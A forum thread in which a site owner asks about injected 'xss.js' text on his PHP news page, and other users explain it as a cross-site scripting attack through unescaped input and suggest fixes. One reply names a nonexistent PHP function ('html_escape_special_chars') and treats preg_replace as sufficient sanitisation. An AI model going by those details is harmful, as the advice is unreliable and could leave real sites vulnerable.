This is remote text via xss.js located at ha.ckers.org

[jhdesign]

First of all that is nonsense. I have no javascript in my code, and second I have never heard of this website or done anything with it. Please enlighten me!

Yours faithfully,

Jan aka JH Design

 

[Mr. DOS]

You're going to have to tell us more - where in your site is this occurring, and is it in a script you wrote yourself?

From what I can tell, someone's exploited an XSS vulnerability in your site.

--- Mr. DOS

 

[garrettroyce]

Your software isn't escaping html tags. Someone posted a <script> tag in a comments box and your site's source now includes the script as well.

I would delete your page and start again with different software.

 

[jhdesign]

Your software isn't escaping html tags. Someone posted a <script> tag in a comments box and your site's source now includes the script as well.

I would delete your page and start again with different software.

No its not completely written by me, I found it on a website which gives these scripts for usage. I only modified a large piece of it. And it occurs when getting something. Its a news system. So I post something and the code is receiving that. And from that point on my code just stops and tells me this warning. You can probably have a look yourself at http://janhaesen.co.cc

Yours faithfully,

Jan

 

[garrettroyce]

No its not completely written by me, I found it on a website which gives these scripts for usage. I only modified a large piece of it. And it occurs when getting something. Its a news system. So I post something and the code is receiving that. And from that point on my code just stops and tells me this warning. You can probably have a look yourself at http://janhaesen.co.cc

Yours faithfully,

Jan

I did look at the page. If you posted the content on the page and it was changed to this malicious content, then either the software isn't secure (contains a back door for hackers to get in), it has an exploit that a hacker has found, or your password was guessed. XSS attacks come almost exclusively through unsanitized user inputs. If you see a $_POST, $_GET, or $_REQUEST anywhere in your code, it better have html_escape_special_chars or a preg_replace function around it or your site is not safe.

I would still recommend changing software and I would change any passwords you use.

 

[jhdesign]

I did look at the page. If you posted the content on the page and it was changed to this malicious content, then either the software isn't secure (contains a back door for hackers to get in), it has an exploit that a hacker has found, or your password was guessed. XSS attacks come almost exclusively through unsanitized user inputs. If you see a $_POST, $_GET, or $_REQUEST anywhere in your code, it better have html_escape_special_chars or a preg_replace function around it or your site is not safe.

I would still recommend changing software and I would change any passwords you use.

I figured out the problem. I'm now making a inlog page for it. Until now this script wasn't yet protected. My fault, but I didn't have the idea people would make such a mess of it. Thanks for the quick reply. You really helped me out here!

 

[misson]

I figured out the problem. I'm now making a inlog page for it. Until now this script wasn't yet protected. My fault, but I didn't have the idea people would make such a mess of it. Thanks for the quick reply. You really helped me out here!

Requiring a visitor to login won't guarantee security (just ask Myspace). You'll need to filter out unsafe text using (e.g.) the filter functions. If you wish to allow some HTML, you'll need to find (or write, but I don't recommend that path if you're a security newb) a whitelist filter.